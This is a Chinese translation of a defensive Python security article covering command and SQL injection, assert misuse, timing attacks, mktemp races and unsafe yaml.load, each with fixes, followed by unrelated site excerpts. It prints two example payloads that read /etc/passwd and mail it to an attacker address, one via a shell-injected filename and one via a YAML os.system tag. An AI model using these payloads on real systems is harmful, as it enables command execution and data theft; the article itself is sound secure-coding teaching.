摘要:在考慮安全性時,你需要考慮如何避免被濫用,也不例外,即使在標準庫中,也存在用于編寫應用的不良實踐。計時攻擊需要精確性,所以通常不能用于高延遲的遠程網絡。由于大多數應用程序涉及可變延遲,因此幾乎不可能在服務器上編寫計時攻擊。
簡評:編寫安全代碼很困難,當你學習一個編程語言、模塊或框架時,你會學習其使用方法。 在考慮安全性時,你需要考慮如何避免被濫用,Python 也不例外,即使在標準庫中,也存在用于編寫應用的不良實踐。然而,許多 Python 開發人員卻根本不知道它們。1. 輸入注入(Input injection)
注入攻擊非常廣泛而且很常見,注入有很多種類,它們影響所有的語言、框架和環境。
SQL 注入是直接編寫 SQL 查詢(而非使用 ORM) 時將字符串字面量與變量混合。我讀過很多代碼,其中「escaping quotes」被認為是一種修復,但事實并非如此,可以通過這個鏈接查看 SQL 注入所有可能發生的復雜方式。
命令注入可能在使用 popen、subprocess、os.system 調用一個進程并從變量中獲取參數時發生,當調用本地命令時,有人可能會將某些值設置為惡意值。
下面是個簡單的腳本,使用用戶提供的文件名調用子進程:
import subprocess def transcode_file(request, filename): command = "ffmpeg -i "{source}" output_file.mpg".format(source=filename) subprocess.call(command, shell=True) # a bad idea!
攻擊者會將 filename 的值設置為“; cat / etc / passwd | mail them@domain.com 或者其他同樣危險的東西。
修復:
如果你使用了 Web 框架,可以用附帶的實用程序對輸入進行清理,除非有充分的理由,否則不要手動構建 SQL 查詢,大多數 ORM 都具有內置的消毒方法。
對于 shell,可以使用 shlex 模塊正確地轉義輸入。
2. assert 語句(Assert statements)不要使用 assert 語句來防止用戶訪問不應訪問的代碼段。
def foo(request, user): assert user.is_admin, “user does not have access” # secure code...
現在,默認情況下,Python 以 debug 為 true 來執行腳本,但在生產環境中,通常使用優化運行,這將會跳過 assert 語句并直接轉到安全代碼,而不管用戶是否是 is_admin。
修復:
僅在與其他開發人員進行通信時使用 assert 語句,例如在單元測試中或為了防止不正確的 API 使用。
3. 計時攻擊(Timing attacks)計時攻擊本質上是一種通過計時比較提供值所需時間來暴露行為和算法的方式。計時攻擊需要精確性,所以通常不能用于高延遲的遠程網絡。由于大多數 Web 應用程序涉及可變延遲,因此幾乎不可能在 HTTP Web 服務器上編寫計時攻擊。
但是,如果你有提示輸入密碼的命令行應用程序,則攻擊者可以編寫一個簡單的腳本來計算將其值與實際密碼進行比較所需的時間。
修復:
使用在 Python 3.5 中引入的 secrets.compare_digest 來比較密碼和其他私密值。
4.臨時文件(Temporary files)要在 Python 中創建臨時文件,通常使用 mktemp() 函數生成一個文件名,然后使用該名稱創建一個文件。 「這是不安全的,因為另一個進程可能會在調用 mktemp() 和隨后嘗試通過第一個進程創建文件之間的空隙創建一個同名文件。」這意味著應用程序可能加載錯誤的數據或暴露其他的臨時數據。
如果調用不正確的方法,則最新版本的 Python 會拋出運行警告。
修復:
如果需要生成臨時文件,請使用 tempfile 模塊并使用 mkstemp。
5. 使用 yaml.load引用 PyYAML 文檔:
警告:使用從不可信源接收到的數據來調用 yaml.load 是不安全的! yaml.load 和pickle.load 一樣強大,所以可以調用任何 Python 函數。
在流行的 Python 項目 Ansible 中找到的這個美麗的例子,你可以將此值作為(有效)YAML 提供給 Ansible Vault,它使用文件中提供的參數調用 os.system()。
!!python/object/apply:os.system ["cat /etc/passwd | mail me@hack.c"]
所以,從用戶提供的值中有效地加載 YAML 文件會讓應用對攻擊打開大門。
修復:
總是使用 yaml.safe_load,除非你有一個非常好的理由。
原文:10 common security gotchas in Python and how to avoid them
文章版權歸作者所有,未經允許請勿轉載,若此文章存在違規行為,您可以聯系管理員刪除。
轉載請注明本文地址:http://specialneedsforspecialkids.com/yun/41914.html
摘要:在考慮安全性時,你需要考慮如何避免被濫用,也不例外,即使在標準庫中,也存在用于編寫應用的不良實踐。修復使用替換標準庫模塊,它增加了針對這些類型攻擊的安全防護。但這卻是中最大的安全漏洞之一。 簡評:編寫安全代碼很困難,當你學習一個編程語言、模塊或框架時,你會學習其使用方法。 在考慮安全性時,你需要考慮如何避免被濫用,Python也不例外,即使在標準庫中,也存在用于編寫應用的不良實踐。然而...
摘要:在考慮安全性時,你需要考慮如何避免被濫用,也不例外,即使在標準庫中,也存在用于編寫應用的不良實踐。計時攻擊需要精確性,所以通常不能用于高延遲的遠程網絡。由于大多數應用程序涉及可變延遲,因此幾乎不可能在服務器上編寫計時攻擊。 簡評:編寫安全代碼很困難,當你學習一個編程語言、模塊或框架時,你會學習其使用方法。 在考慮安全性時,你需要考慮如何避免被濫用,Python 也不例外,即使在標準庫中...
摘要:下面是需要了解的個命令和它們的一些常見標志。每個命令都鏈接到該命令的指南。僅用于提交級別。指定一個不同的提交,而不是來丟棄自提交以來的更改。包裝在本文中,你已經看到了一些關鍵的命令,并配置了環境以節省時間。 showImg(https://segmentfault.com/img/remote/1460000018662396); 在本文中,我們將討論那些作為開發人員、數據科學家或產品...
摘要:它主要是為了允許在中使用基于的機器學習,但是它可以與任何庫或框架一起使用。已經通過啟用服務器通過使用的機器學習服務在中執行腳本,添加到其高級分析擴展,現在稱為機器學習服務。存儲的實例必須安裝具有的機器學習服務要在中使用執行腳本,應運行或。 Python和SQL Server 2017的強大功能 Python是SQL Server 2017的新功能。它主要是為了允許在SQLServer中...
摘要:巔峰人生年老兵思路上的轉變,遠比單純提升技術更有價值本文節選自趙成教授在極客時間開設的趙成的運維體系管理課,是其對自己十年技術生涯的回顧與總結。趙成教授來自美麗聯合集團,集團旗下兩大主力產品是蘑菇街和美麗說,目前負責管理集團的技術服務團隊。 showImg(https://segmentfault.com/img/remote/1460000012476504?w=1240&h=826...
閱讀 2380·2021-11-12 10:34
閱讀 1465·2019-08-29 16:15
閱讀 2678·2019-08-29 15:17
閱讀 1334·2019-08-23 17:09
閱讀 389·2019-08-23 11:37
閱讀 2451·2019-08-23 10:39
閱讀 468·2019-08-22 16:43
閱讀 3107·2019-08-22 14:53